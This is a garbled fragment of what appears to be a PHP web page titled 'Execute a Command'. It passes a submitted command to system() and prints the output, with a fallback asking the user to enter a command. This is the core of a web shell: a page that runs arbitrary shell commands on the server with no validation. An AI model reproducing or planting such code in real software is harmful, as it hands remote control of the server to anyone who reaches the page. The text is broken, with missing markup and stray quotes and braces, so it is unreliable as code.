Execute a Command




Command Output:
";
            system($command, $output);
            echo "
"; } else { echo "

Please enter a command.

"; } } ?>